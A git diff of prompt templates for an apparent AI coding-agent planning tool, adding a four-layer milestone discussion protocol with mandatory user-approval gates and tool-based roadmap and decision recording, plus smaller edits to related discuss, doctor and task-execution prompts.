+## Preparation Briefs
+
+The following briefs were generated during the preparation phase. Use them to ground your recommendations.
+
+### Codebase Brief
+
+{{codebaseBrief}}
+
+### Prior Context Brief
+
+{{priorContextBrief}}
+
+### Ecosystem Brief
+
+{{ecosystemBrief}}
+
+---
+
+## 4-Layer Discussion Protocol
+
+This discussion proceeds through four mandatory layers. At each layer:
+1. **Present findings** — share what the preparation revealed
+2. **Make a recommendation** — take a position based on the evidence
+3. **Ask clarifying questions** — fill gaps the preparation couldn't answer
+4. **Gate** — use `ask_user_questions` to get explicit sign-off before advancing
+
+**Do NOT skip layers.** Each layer builds on the previous. The user must explicitly approve each layer before you proceed.
+
+---
+
+## Depth Adaptation
+
+The depth of questioning at each layer should match THIS milestone's work type. Do not apply a fixed checklist — reason from first principles about what matters for this specific work.
+
+**Work-type reasoning:**
+- **API/service work** — Focus Layer 2 questions on contracts, versioning, backwards compatibility, authentication boundaries. Layer 3 must cover rate limiting, timeout cascades, and partial failure states.
+- **CLI/developer tools** — Focus Layer 1 on user mental model and command grammar. Layer 4 needs shell compatibility, error message clarity, and exit code semantics.
+- **ML/data pipelines** — Focus Layer 2 on data flow, reproducibility, and intermediate state. Layer 3 must cover data corruption, training divergence, and checkpoint recovery.
+- **UI/frontend work** — Focus Layer 2 on component boundaries and state management. Layer 3 needs loading states, optimistic updates, and offline behavior. Layer 4 must include visual regression criteria.
+- **Infrastructure/platform** — Focus Layer 2 on deployment topology and failure domains. Layer 3 must cover cascading failures, resource exhaustion, and rollback paths.
+- **Refactoring/migration** — Focus Layer 1 on what changes vs what must stay identical. Layer 4 needs behavioral equivalence tests, not just code coverage.
+
+**Adaptation principle:** Ask "What would cause this milestone to fail silently or succeed incorrectly?" The answer shapes which questions deserve deep exploration vs quick confirmation.
+
+---
+
+## Layer 1 — Scope (What are we building?)
+
+### Identify Work Type
+
+**Before presenting findings, identify the primary work type and state it explicitly:**
+
+"Based on [user's request and codebase analysis], this milestone is primarily **[work type]** work (e.g., API/backend, UI/frontend, CLI tool, data pipeline, simulation, infrastructure)."
+
+This classification determines the depth and focus of questioning at each layer. If the work type spans multiple categories, state the dominant type and note the secondary types. The user can correct this classification.
+
+### Present Findings
+
+Start by presenting what you learned from the preparation:
+
+1. **From the Codebase Brief:** Summarize the technology stack, key modules, and established patterns. Call out anything that constrains or enables the proposed work.
+
+2. **From the Prior Context Brief:** Surface existing decisions, requirements, and knowledge that are relevant. Note any prior commitments or constraints.
+
+3. **Scope implications:** Based on the above, explain what scope makes sense and what would conflict with the existing codebase.
+
+### Make a Recommendation
+
+Take a clear position: "Based on [specific findings], I recommend the milestone scope as [concrete description]."
+
+Include:
+- What the milestone will deliver (user-visible outcome)
+- What it explicitly excludes (to prevent scope creep)
+- Rough size estimate (number of slices, complexity)
+
+### Resolve Scope — Mandatory Rounds
+
+After presenting your recommendation, you MUST complete these rounds in order. Each round uses `ask_user_questions` or direct questions. Do NOT skip rounds. Do NOT combine rounds. Do NOT jump to the Layer 1 Gate until all rounds are complete.
+
+**Complexity calibration:** If the milestone is simple (1-2 slices, well-understood patterns, no ambiguity), you may compress rounds — but you must still explicitly address each round's topic, even if briefly. You may NOT skip rounds entirely. For complex milestones (3+ slices, novel architecture, significant ambiguity), give each round full treatment.
+
+**Round 1 — Feature boundaries:**
+For each feature in your recommendation, state what it includes and excludes. Ask the user to confirm or adjust each boundary. Example: "Signup — I'm including email/password registration. I'm excluding OAuth, email verification, and phone number signup. Correct?"
+
+**Round 2 — Ambiguity resolution:**
+Identify every term or concept in the scope that could be interpreted multiple ways. For each one, state the two most likely interpretations and ask which the user intends. Example: "'User authentication' — do you mean just login/signup, or also session management, token refresh, and logout?"
+
+**Round 3 — Dependencies and constraints:**
+Ask about external dependencies (APIs, services, databases), existing code that will be affected, and constraints the user hasn't mentioned. Reference specific findings from the codebase brief. Example: "Your db.ts already has a getUser() function — should signup create users compatible with this existing model?"
+
+**Round 4 — Priority and ordering:**
+If the scope has multiple features, ask the user to rank them by priority. Ask what's the minimum viable version if the milestone needs to be cut short. Example: "If we had to ship with only 2 of the 3 slices, which two matter most?"
+
+After completing all 4 rounds, proceed to the Layer 1 Gate.
+
+### Layer 1 Gate
+
+Before advancing, use `ask_user_questions` with question ID containing `layer1_scope_gate`:
+
+```
+Header: "Scope Gate"
+Question: "Does this scope capture what you want to build?"
+Options:
+  - "Yes, scope is correct (Recommended)" — proceed to Layer 2
+  - "Needs adjustment" — user will clarify, then re-present scope
+```
+
+**CRITICAL — Non-bypassable gate:** Do NOT proceed to Layer 2 until the user explicitly approves the scope. If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block. "Tool not responding, I'll proceed," "auth issues," or "I'll use my recommended scope" are all **forbidden**. The gate exists to protect the user's work; treat a block as an instruction to wait, not an obstacle to work around.
+
+---
+
+## Ecosystem Research (between layers)
+
+Before presenting Layer 2 findings, use your available web search tools to research the technologies identified in the Codebase Brief. For each major technology (framework, ORM, key library):
+
+1. Search for "[technology] [version] best practices [current year]"
+2. Search for "[technology] [version] known issues"
+
+Summarize findings concisely. If search tools fail or are unavailable, note this and proceed using your training knowledge — but do NOT use a search failure as justification to skip any gate.
+
+Present ecosystem findings at the start of Layer 2 alongside your architecture recommendation.
+
+---
+
+## Layer 2 — Architecture (How will it work?)
+
+### Present Findings
+
+Now present architectural recommendations grounded in evidence:
+
+1. **From the Ecosystem Brief:** Share relevant best practices, known issues, library recommendations, and integration patterns discovered during research.
+
+2. **From the Codebase Brief:** Identify existing architectural patterns that should be followed or deliberately broken from.
+
+3. **Synthesis:** Explain how the ecosystem research applies to this specific codebase context.
+
+### Make a Recommendation
+
+Take a clear position: "I'd suggest [approach] because [evidence-based rationale]."
+
+Cover:
+- Overall architectural approach (new module? extend existing? separate service?)
+- Key technical decisions (which libraries, patterns, data flow)
+- Integration points with existing code
+- What you'd avoid and why
+
+### Resolve Architecture — Mandatory Rounds
+
+After presenting your recommendation, you MUST complete these rounds in order. Do NOT skip rounds. Do NOT jump to the Layer 2 Gate until all rounds are complete.
+
+**Complexity calibration:** If the milestone is simple (1-2 slices, well-understood patterns, no ambiguity), you may compress rounds — but you must still explicitly address each round's topic, even if briefly. You may NOT skip rounds entirely. For complex milestones (3+ slices, novel architecture, significant ambiguity), give each round full treatment.
+
+**Round 1 — Per-slice technical decisions:**
+For each slice in your decomposition, state the specific technical approach. Ask the user to confirm or adjust. Don't just say "build the signup endpoint" — state which library handles password hashing, where the route file lives, what the request/response schema looks like.
+
+**Round 2 — Inter-slice contracts:**
+For each dependency between slices, state explicitly what the upstream slice produces and what the downstream slice expects. Ask the user to confirm the interface. Example: "S01 produces a User model with {id, email, hashedPassword}. S02's login endpoint will query by email and compare password. Does this contract work?"
+
+**Round 3 — Library and pattern decisions:**
+For each library or pattern choice, present at least one alternative with tradeoffs. Ask the user to confirm. Example: "bcrypt vs argon2 for password hashing — bcrypt is more common in Node, argon2 is newer and more resistant to GPU attacks. I recommend bcrypt for simplicity. Agree?"
+
+**Round 4 — Integration with existing code:**
+Walk through how the new code connects to existing files and patterns. Ask about anything that might conflict. Reference specific files from the codebase brief. Example: "The new auth routes will mount at /api/auth alongside your existing /api router in routes.ts. Should they share the same router file or get their own auth-routes.ts?"
+
+After completing all 4 rounds, proceed to the Layer 2 Gate.
+
+### Layer 2 Gate
+
+Before advancing, use `ask_user_questions` with question ID containing `layer2_architecture_gate`:
+
+```
+Header: "Architecture Gate"
+Question: "Ready to move to error handling, or want to adjust the architecture?"
+Options:
+  - "Architecture looks good (Recommended)" — proceed to Layer 3
+  - "Want to adjust" — user will clarify, then re-present architecture
+```
+
+**CRITICAL — Non-bypassable gate:** Do NOT proceed to Layer 3 until the user explicitly approves the architecture. If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block. The gate exists to protect the user's work; treat a block as an instruction to wait, not an obstacle to work around.
+
+---
+
+## Layer 3 — Error States (What can go wrong?)
+
+### Present Findings
+
+Identify failure modes based on the scope and architecture:
+
+1. **From the Ecosystem Brief:** Known issues, common pitfalls, edge cases that trip up similar implementations.
+
+2. **From the Architecture:** Failure points at integration boundaries, async operations, external dependencies, user input handling.
+
+3. **From the Codebase Brief:** How existing code handles errors — patterns to follow, gaps to fill.
+
+### Make a Recommendation
+
+Take a clear position: "The critical error paths are [X, Y, Z]. I recommend handling them by [approach]."
+
+Cover:
+- **Must-handle errors:** Failures that would break the user experience or corrupt data
+- **Should-handle errors:** Degraded experiences that are acceptable with good messaging
+- **Edge cases:** Boundary conditions, malformed input, timing issues
+- **Recovery strategy:** Retry logic, fallback behavior, user notification
+
+### Resolve Error Handling — Mandatory Rounds
+
+After presenting your recommendation, ask the user:
+
+**"Do you want to go deep on error handling, or accept the defaults I recommended?"**
+
+Use `ask_user_questions` with options: "Go deep" / "Accept defaults"
+
+If they accept defaults, record your recommendations as decisions and proceed to the Layer 3 Gate.
+
+If they want to go deep, complete these rounds:
+
+**Complexity calibration:** If the milestone is simple, you may compress rounds — but you must still explicitly address each round's topic. You may NOT skip rounds entirely.
+
+**Round 1 — Input validation:**
+For each endpoint or entry point, state what input validation happens and what error the user sees for invalid input. Ask the user to confirm. Example: "Signup with missing email returns 400 with {error: 'Email is required'}. Signup with invalid email format returns 400 with {error: 'Invalid email format'}. Right?"
+
+**Round 2 — Authentication/authorization failures:**
+For each protected operation, state what happens when auth fails. Ask the user to confirm. Example: "Expired JWT returns 401. Missing JWT returns 401. Malformed JWT returns 401. All three use the same generic message to avoid information leakage. Correct?"
+
+**Round 3 — System failures:**
+For each external dependency (database, API, file system), state what happens when it's unavailable. Ask the user to confirm. Example: "If Prisma can't connect to the database, all endpoints return 500 with a generic message. We log the real error server-side but never expose it to the client."
+
+After completing all rounds (or accepting defaults), proceed to the Layer 3 Gate.
+
+### Layer 3 Gate
+
+Before advancing, use `ask_user_questions` with question ID containing `layer3_error_gate`:
+
+```
+Header: "Error Handling Gate"
+Question: "Error handling strategy captured. Ready to define the quality bar?"
+Options:
+  - "Yes, move to quality bar (Recommended)" — proceed to Layer 4
+  - "Want to adjust error handling" — user will clarify, then re-present errors
+```
+
+**CRITICAL — Non-bypassable gate:** Do NOT proceed to Layer 4 until the user explicitly approves error handling. If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block. The gate exists to protect the user's work; treat a block as an instruction to wait, not an obstacle to work around.
+
+---
+
+## Layer 4 — Quality Bar (What does done mean?)
+
+### Present Findings
+
+Define what "done" looks like based on everything discussed:
+
+1. **Testing requirements:** What must be tested? Unit tests, integration tests, E2E tests? Based on the architecture's complexity and risk profile.
+
+2. **Acceptance criteria:** Concrete, observable outcomes that prove the milestone is complete. Derived from the scope discussion.
+
+3. **Performance/quality constraints:** Based on ecosystem research and codebase patterns — response times, error rates, accessibility requirements.
+
+### Make a Recommendation
+
+Take a clear position: "For this scope, I'd suggest these acceptance criteria: [list]."
+
+Include:
+- **Definition of done:** What conditions must be true for the milestone to be complete?
+- **Test coverage expectations:** What must be tested vs nice-to-have?
+- **Quality gates:** What would block shipping?
+
+### Resolve Quality — Mandatory Rounds
+
+After presenting your recommendation, you MUST complete these rounds in order. Do NOT skip rounds.
+
+**Complexity calibration:** If the milestone is simple, you may compress rounds — but you must still explicitly address each round's topic, even if briefly. You may NOT skip rounds entirely.
+
+**Round 1 — Per-slice acceptance criteria:**
+For each slice, state 3-5 specific, testable acceptance criteria. Ask the user to confirm each slice's criteria. These must be concrete enough that the planner can use them directly. "Tests pass" is NOT an acceptance criterion. "POST /api/auth/signup with {email, password} returns 201 with {id, email}" IS an acceptance criterion.
+
+**Round 2 — Test strategy:**
+For each slice, state what type of tests are needed (unit, integration, e2e) and what specifically gets tested. Ask the user to confirm. Example: "S01 needs: unit test for password hashing, integration test for signup endpoint with valid and invalid inputs. No e2e needed for this slice."
+
+**Round 3 — Definition of done:**
+State the end-to-end scenario that proves the milestone works. Ask the user to confirm. Example: "Done means: a new user can sign up, log in, receive a JWT, and use that JWT to access a protected endpoint — all verified by running the sequence manually or via integration test."
+
+After completing all 3 rounds, proceed to the Layer 4 Gate.
+
+### Layer 4 Gate
+
+Before advancing, use `ask_user_questions` with question ID containing `layer4_quality_gate`:
+
+```
+Header: "Quality Gate"
+Question: "Quality bar defined. Ready to write context and roadmap?"
+Options:
+  - "Yes, write the artifacts (Recommended)" — proceed to Output Phase
+  - "Want to adjust the quality bar" — user will clarify, then re-present quality
+```
+
+**CRITICAL — Non-bypassable gate:** Do NOT proceed to Output Phase until the user explicitly approves the quality bar. If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block. The gate exists to protect the user's work; treat a block as an instruction to wait, not an obstacle to work around.
+
+---
+
+## Output Phase
+
+Once all four layers are complete, you have gathered:
+- Confirmed scope (Layer 1)
+- Approved architecture (Layer 2)
+- Error handling strategy (Layer 3)
+- Quality bar and acceptance criteria (Layer 4)
+
+### Capability Contract
+
+Before writing a roadmap, produce or update `.gsd/REQUIREMENTS.md`.
+
+Use it as the project's explicit capability contract. Requirements discovered during the 4-layer discussion should be captured here with source `user` or `inferred` as appropriate.
+
+**Print the requirements in chat before writing the roadmap.** Print a markdown table with columns: ID, Title, Status, Owner, Source. Group by status (Active, Deferred, Out of Scope). After the table, ask: "Confirm, adjust, or add?" **Non-bypassable:** If the user does not respond or gives an ambiguous answer, you MUST re-ask — never proceed to roadmap creation without explicit requirement confirmation.
+
+### Roadmap Preview
+
+Before writing any files, **print the planned roadmap in chat** so the user can see and approve it. Print a markdown table with columns: Slice, Title, Risk, Depends, Demo. One row per slice. Below the table, print the milestone definition of done as a bullet list.
+
+If the user raises a substantive objection, adjust the roadmap. Otherwise, present the roadmap and ask: "Ready to write, or want to adjust?" — one gate, not two. **Non-bypassable:** If the user does not respond or gives an ambiguous answer, you MUST re-ask — never write files without explicit approval. A missing response is not a "yes."
+
+### Naming Convention
+
+Directories use bare IDs. Files use ID-SUFFIX format. Titles live inside file content, not in names.
+- Milestone dir: `.gsd/milestones/{{milestoneId}}/`
+- Milestone files: `{{milestoneId}}-CONTEXT.md`, `{{milestoneId}}-ROADMAP.md`
+- Slice dirs: `S01/`, `S02/`, etc.
+
+### Single Milestone
+
+Once the user is satisfied, in a single pass:
+1. `mkdir -p .gsd/milestones/{{milestoneId}}/slices`
+2. Write or update `.gsd/PROJECT.md` — use the **Project** output template below. Describe what the project is, its current state, and list the milestone sequence.
+3. Write or update `.gsd/REQUIREMENTS.md` — use the **Requirements** output template below. Confirm requirement states, ownership, and traceability before roadmap creation.
+
+**Depth-Preservation Guidance for context.md:**
+When writing context.md, preserve the user's exact terminology, emphasis, and specific framing from the discussion. Do not paraphrase user nuance into generic summaries. If the user said "craft feel," write "craft feel" — not "high-quality user experience." If they emphasized a specific constraint or negative requirement, carry that emphasis through verbatim. The context file is downstream agents' only window into this conversation — flattening specifics into generics loses the signal that shaped every decision.
+
+**Enhanced Context Requirement:** Because this is a prepared discussion, use the `context-enhanced` template which includes sections for Codebase Brief, Architectural Decisions, Interface Contracts, Error Handling Strategy, Testing Requirements, Acceptance Criteria, and Ecosystem Notes. Populate these from the 4-layer discussion:
+- Codebase Brief: from Layer 1 presentation
+- Architectural Decisions: from Layer 2 — each decision with rationale, evidence, alternatives
+- Error Handling Strategy: from Layer 3
+- Testing Requirements and Acceptance Criteria: from Layer 4
+- Ecosystem Notes: key findings from the ecosystem brief
+
+4. Write `{{contextPath}}` — use the **Context Enhanced** output template below. Preserve key risks, unknowns, existing codebase constraints, integration points, and relevant requirements surfaced during discussion.
+5. Call `gsd_plan_milestone` to create the roadmap. Decompose into demoable vertical slices with risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, requirement coverage, and a boundary map. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment. Use the **Roadmap** output template below to structure the tool call parameters.
+6. For each architectural or pattern decision made during discussion, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
+7. {{commitInstruction}}
+
+After writing the files, say exactly: "Milestone {{milestoneId}} ready." — nothing else. Auto-mode will start automatically.
+
+### Multi-Milestone
+
+Once the user confirms the milestone split:
+
+#### Phase 1: Shared artifacts
+
+1. For each milestone, call `gsd_milestone_generate_id` to get its ID — never invent milestone IDs manually. Then `mkdir -p .gsd/milestones/<ID>/slices`.
+2. Write `.gsd/PROJECT.md` — use the **Project** output template below.
+3. Write `.gsd/REQUIREMENTS.md` — use the **Requirements** output template below. Capture Active, Deferred, Out of Scope, and any already Validated requirements. Later milestones may have provisional ownership where slice plans do not exist yet.
+4. For any architectural or pattern decisions made during discussion, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
+
+#### Phase 2: Primary milestone
+
+5. Write a full enhanced `CONTEXT.md` for the primary milestone (the one discussed in depth). Use the `context-enhanced` template.
+6. Call `gsd_plan_milestone` for **only the primary milestone** — detail-planning later milestones now is waste because the codebase will change. Include requirement coverage and a milestone definition of done.
+
+#### MANDATORY: depends_on Frontmatter in CONTEXT.md
+
+Every CONTEXT.md for a milestone that depends on other milestones MUST have YAML frontmatter with `depends_on`. The auto-mode state machine reads this field to determine execution order — without it, milestones may execute out of order or in parallel when they shouldn't.
+
+```yaml
+---
+depends_on: [M001, M002]
+---
+
+# M003: Title
+```
+
+If a milestone has no dependencies, omit the frontmatter. The dependency chain from the milestone confirmation gate MUST be reflected in each CONTEXT.md frontmatter. Do NOT rely on QUEUE.md or PROJECT.md for dependency tracking — the state machine only reads CONTEXT.md frontmatter.
+
+#### Phase 3: Sequential readiness gate for remaining milestones
+
+For each remaining milestone **one at a time, in sequence**, decide the most likely readiness mode from the evidence you already have, then use `ask_user_questions` to let the user correct that recommendation. Present three options:
+
+- **"Discuss now"** — The user wants to conduct a focused discussion for this milestone in the current session, while the context from the broader discussion is still fresh. Proceed with a focused discussion for this milestone (Layer 1-4 protocol). When the discussion concludes, write a full enhanced `CONTEXT.md`. Then move to the gate for the next milestone.
+- **"Write draft for later"** — This milestone has seed material from the current conversation but needs its own dedicated discussion in a future session. Write a `CONTEXT-DRAFT.md` capturing the seed material (what was discussed, key ideas, provisional scope, open questions). Mark it clearly as a draft, not a finalized context. **What happens downstream:** When auto-mode reaches this milestone, it pauses and notifies the user: "M00x has draft context — needs discussion. Run /gsd." The `/gsd` wizard shows a "Discuss from draft" option that seeds the new discussion with this draft, so nothing from the current conversation is lost. After the dedicated discussion produces a full CONTEXT.md, the draft file is automatically deleted.
+- **"Just queue it"** — This milestone is identified but intentionally left without context. No context file is written — the directory already exists from Phase 1. **What happens downstream:** When auto-mode reaches this milestone, it pauses and notifies the user to run /gsd. The wizard starts a full discussion from scratch.
+
+**When "Discuss now" is chosen:** Run the full 4-layer protocol for that milestone using fresh preparation briefs scoped to that milestone.
+
+#### Milestone Gate Tracking (MANDATORY for multi-milestone)
+
+After EVERY Phase 3 gate decision, immediately write or update `.gsd/DISCUSSION-MANIFEST.json` with the cumulative state. This file is mechanically validated by the system before auto-mode starts — if gates are incomplete, auto-mode will NOT start.
+
+```json
+{
+  "primary": "M001",
+  "milestones": {
+    "M001": { "gate": "discussed", "context": "full" },
+    "M002": { "gate": "discussed", "context": "full" },
+    "M003": { "gate": "queued",    "context": "none" }
+  },
+  "total": 3,
+  "gates_completed": 3
+}
+```
+
+Write this file AFTER each gate decision, not just at the end. Update `gates_completed` incrementally. The system reads this file and BLOCKS auto-start if `gates_completed < total`.
+
+For single-milestone projects, do NOT write this file — it is only for multi-milestone discussions.
+
+#### Phase 4: Finalize
+
+7. {{multiMilestoneCommitInstruction}}
+
+After writing the files, say exactly: "Milestone M001 ready." — nothing else. Auto-mode will start automatically.
+
+{{inlinedTemplates}}
diff --git a/src/resources/extensions/gsd/prompts/discuss.md b/src/resources/extensions/gsd/prompts/discuss.md
index 38c71647d..4061bc054 100644
--- a/src/resources/extensions/gsd/prompts/discuss.md
+++ b/src/resources/extensions/gsd/prompts/discuss.md
@@ -37,7 +37,7 @@ Before asking your first question, do a mandatory investigation pass. This is no
 3. **Web search** — `search-the-web` if the domain is unfamiliar, if you need current best practices, or if the user referenced external services/APIs you need facts about. Use `fetch_page` for full content when snippets aren't enough.
 
 **Web search budget:** You have a limited number of web searches per turn (typically 3-5). The discuss phase spans many turns (investigation, question rounds, focused research, requirements), so budget carefully:
-- Prefer `resolve_library` / `get_library_docs` over `web_search` for library documentation — they don't consume the web search budget.
+- Prefer `resolve_library` / `get_library_docs` over `search-the-web` for library documentation — they don't consume the web search budget.
 - Prefer `search_and_read` for one-shot topic research — it combines search + page fetch in a single call.
 - Target 2-3 web searches in the investigation pass. Save remaining budget for the focused research pass before roadmap creation.
 - Do NOT repeat the same or similar queries. If a search didn't find what you need, rephrase once or move on.
@@ -114,6 +114,8 @@ If they clarify, absorb the correction and re-verify.
 
 The depth verification is the required write-gate. Do **not** add another meta "ready to proceed?" checkpoint immediately after it unless there is still material ambiguity.
 
+**CRITICAL — Non-bypassable gate:** The system mechanically blocks CONTEXT.md writes until the user selects the "(Recommended)" option. If the user declines, cancels, or the tool fails, you MUST re-ask — never rationalize past the block ("tool not responding, I'll proceed" is forbidden). The gate exists to protect the user's work; treat a block as an instruction, not an obstacle to work around.
+
 ## Wrap-up Gate
 
 Once the depth checklist is fully satisfied, move directly into requirements and roadmap preview. Do not insert a separate "are you ready to continue?" gate unless the user explicitly wants to keep brainstorming or you still see material ambiguity.
@@ -171,7 +173,7 @@ For multi-milestone projects, requirements should span the full vision. Requirem
 
 If the project is new or has no `REQUIREMENTS.md`, surface candidate requirements in chat before writing the roadmap. Ask for correction only on material omissions, wrong ownership, or wrong scope. If the user has already been specific and raises no substantive objection, treat the requirement set as confirmed and continue.
 
-**Print the requirements in chat before writing the roadmap.** Do not say "here are the requirements" and then only write them to a file. The user must see them in the terminal. Print a markdown table with columns: ID, Title, Status, Owner, Source. Group by status (Active, Deferred, Out of Scope). After the table, ask: "Confirm, adjust, or add?"
+**Print the requirements in chat before writing the roadmap.** Do not say "here are the requirements" and then only write them to a file. The user must see them in the terminal. Print a markdown table with columns: ID, Title, Status, Owner, Source. Group by status (Active, Deferred, Out of Scope). After the table, ask: "Confirm, adjust, or add?" **Non-bypassable:** If the user does not respond or gives an ambiguous answer, you MUST re-ask — never proceed to roadmap creation without explicit requirement confirmation.
 
 ## Scope Assessment
 
@@ -183,7 +185,7 @@ Before moving to output, confirm the size estimate from your reflection still ho
 
 Before writing any files, **print the planned roadmap in chat** so the user can see and approve it. Print a markdown table with columns: Slice, Title, Risk, Depends, Demo. One row per slice. Below the table, print the milestone definition of done as a bullet list.
 
-If the user raises a substantive objection, adjust the roadmap. Otherwise, present the roadmap and ask: "Ready to write, or want to adjust?" — one gate, not two.
+If the user raises a substantive objection, adjust the roadmap. Otherwise, present the roadmap and ask: "Ready to write, or want to adjust?" — one gate, not two. **Non-bypassable:** If the user does not respond or gives an ambiguous answer, you MUST re-ask — never write files without explicit approval. A missing response is not a "yes."
 
 ### Naming Convention
 
@@ -202,8 +204,8 @@ Once the user is satisfied, in a single pass:
 When writing context.md, preserve the user's exact terminology, emphasis, and specific framing from the discussion. Do not paraphrase user nuance into generic summaries. If the user said "craft feel," write "craft feel" — not "high-quality user experience." If they emphasized a specific constraint or negative requirement, carry that emphasis through verbatim. The context file is downstream agents' only window into this conversation — flattening specifics into generics loses the signal that shaped every decision.
 
 4. Write `{{contextPath}}` — use the **Context** output template below. Preserve key risks, unknowns, existing codebase constraints, integration points, and relevant requirements surfaced during discussion.
-5. Write `{{roadmapPath}}` — use the **Roadmap** output template below. Decompose into demoable vertical slices with checkboxes, risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, requirement coverage, and a boundary map. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment.
-6. Seed `.gsd/DECISIONS.md` — use the **Decisions** output template below. Append rows for any architectural or pattern decisions made during discussion.
+5. Call `gsd_plan_milestone` to create the roadmap. Decompose into demoable vertical slices with risk, depends, demo sentences, proof strategy, verification classes, milestone definition of done, requirement coverage, and a boundary map. If the milestone crosses multiple runtime boundaries, include an explicit final integration slice that proves the assembled system works end-to-end in a real environment. Use the **Roadmap** output template below to structure the tool call parameters.
+6. For each architectural or pattern decision made during discussion, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
 7. {{commitInstruction}}
 
 After writing the files, say exactly: "Milestone {{milestoneId}} ready." — nothing else. Auto-mode will start automatically.
@@ -217,12 +219,12 @@ Once the user confirms the milestone split:
 1. For each milestone, call `gsd_milestone_generate_id` to get its ID — never invent milestone IDs manually. Then `mkdir -p .gsd/milestones/<ID>/slices`.
 2. Write `.gsd/PROJECT.md` — use the **Project** output template below.
 3. Write `.gsd/REQUIREMENTS.md` — use the **Requirements** output template below. Capture Active, Deferred, Out of Scope, and any already Validated requirements. Later milestones may have provisional ownership where slice plans do not exist yet.
-4. Seed `.gsd/DECISIONS.md` — use the **Decisions** output template below.
+4. For any architectural or pattern decisions made during discussion, call `gsd_decision_save` — the tool auto-assigns IDs and regenerates `.gsd/DECISIONS.md` automatically.
 
 #### Phase 2: Primary milestone
 
 5. Write a full `CONTEXT.md` for the primary milestone (the one discussed in depth).
-6. Write a `ROADMAP.md` for **only the primary milestone** — detail-planning later milestones now is waste because the codebase will change. Include requirement coverage and a milestone definition of done.
+6. Call `gsd_plan_milestone` for **only the primary milestone** — detail-planning later milestones now is waste because the codebase will change. Include requirement coverage and a milestone definition of done.
 
 #### MANDATORY: depends_on Frontmatter in CONTEXT.md
 
@@ -240,7 +242,7 @@ If a milestone has no dependencies, omit the frontmatter. The dependency chain f
 
 #### Phase 3: Sequential readiness gate for remaining milestones
 
-For each remaining milestone **one at a time, in sequence**, decide the most likely readiness mode from the evidence you already have, then use `ask_user_questions` to let the user correct that recommendation. Present three options:
+For each remaining milestone **one at a time, in sequence**, decide the most likely readiness mode from the evidence you already have, then use `ask_user_questions` to let the user correct that recommendation. **Non-bypassable:** If `ask_user_questions` fails, errors, returns no response, or the user's response does not match a provided option, you MUST re-ask — never rationalize past the block or auto-select a readiness mode. Present three options:
 
 - **"Discuss now"** — The user wants to conduct a focused discussion for this milestone in the current session, while the context from the broader discussion is still fresh. Proceed with a focused discussion for this milestone (reflection → investigation → questioning → depth verification). When the discussion concludes, write a full `CONTEXT.md`. Then move to the gate for the next milestone.
 - **"Write draft for later"** — This milestone has seed material from the current conversation but needs its own dedicated discussion in a future session. Write a `CONTEXT-DRAFT.md` capturing the seed material (what was discussed, key ideas, provisional scope, open questions). Mark it clearly as a draft, not a finalized context. **What happens downstream:** When auto-mode reaches this milestone, it pauses and notifies the user: "M00x has draft context — needs discussion. Run /gsd." The `/gsd` wizard shows a "Discuss from draft" option that seeds the new discussion with this draft, so nothing from the current conversation is lost. After the dedicated discussion produces a full CONTEXT.md, the draft file is automatically deleted.
diff --git a/src/resources/extensions/gsd/prompts/doctor-heal.md b/src/resources/extensions/gsd/prompts/doctor-heal.md
index 3270ae070..36181312a 100644
--- a/src/resources/extensions/gsd/prompts/doctor-heal.md
+++ b/src/resources/extensions/gsd/prompts/doctor-heal.md
@@ -9,6 +9,7 @@ Rules:
 4. For missing summaries or UAT files, generate the real artifact from existing slice/task context when possible — do not leave placeholders if you can reconstruct the real content.
 5. After each repair cluster, verify the relevant invariant directly from disk.
 6. When done, rerun `/gsd doctor {{doctorCommandSuffix}}` mentally by ensuring the remaining issue set for this scope is reduced or cleared.
+7. Do NOT query `.gsd/gsd.db` directly via `sqlite3` or `node -e require('better-sqlite3')` — use `gsd_milestone_status` to inspect DB state. Direct access bypasses the WAL connection owned by the engine and can corrupt in-flight writes.
 
 ## Doctor Summary
 
diff --git a/src/resources/extensions/gsd/prompts/execute-task.md b/src/resources/extensions/gsd/prompts/execute-task.md
index 017870611..ddf3fa1d7 100644
--- a/src/resources/extensions/gsd/prompts/execute-task.md
+++ b/src/resources/extensions/gsd/prompts/execute-task.md
@@ -12,6 +12,8 @@ A researcher explored the codebase and a planner decomposed the work — you are
 
 {{runtimeContext}}
 
+{{phaseAnchorSection}}
+
 {{resumeSection}}
 
 {{carryForwardSection}}
@@ -38,18 +40,21 @@ Then:
    - Correct: `command > /dev/null 2>&1 &` or `nohup command > /dev/null 2>&1 &`
    - Example: `python -m http.server 8080 > /dev/null 2>&1 &` (NOT `python -m http.server 8080 &`)
    - Preferred: use the `bg_shell` tool if available — it manages process lifecycle correctly without stream-inheritance issues
-6. Verify must-haves are met by running concrete checks (tests, commands, observable behaviors)
-7. Run the slice-level verification checks defined in the slice plan's Verification section. Track which pass. On the final task of the slice, all must pass before marking done. On intermediate tasks, partial passes are expected — note which ones pass in the summary.
-8. After the verification gate runs (you'll see gate results in stderr/notify output), populate the `## Verification Evidence` table in your task summary with the check results. Use the `formatEvidenceTable` format: one row per check with command, exit code, verdict (✅ pass / ❌ fail), and duration. If no verification commands were discovered, note that in the section.
-9. If the task touches UI, browser flows, DOM behavior, or user-visible web state:
+6. If the task plan includes a **Failure Modes** section (Q5), implement the error/timeout/malformed handling specified. Verify each dependency's failure path is handled. Skip if the section is absent.
+7. If the task plan includes a **Load Profile** section (Q6), implement protections for the identified 10x breakpoint (connection pooling, rate limiting, pagination, etc.). Skip if absent.
+8. If the task plan includes a **Negative Tests** section (Q7), write the specified negative test cases alongside the happy-path tests — malformed inputs, error paths, and boundary conditions. Skip if absent.
+9. Verify must-haves are met by running concrete checks (tests, commands, observable behaviors)
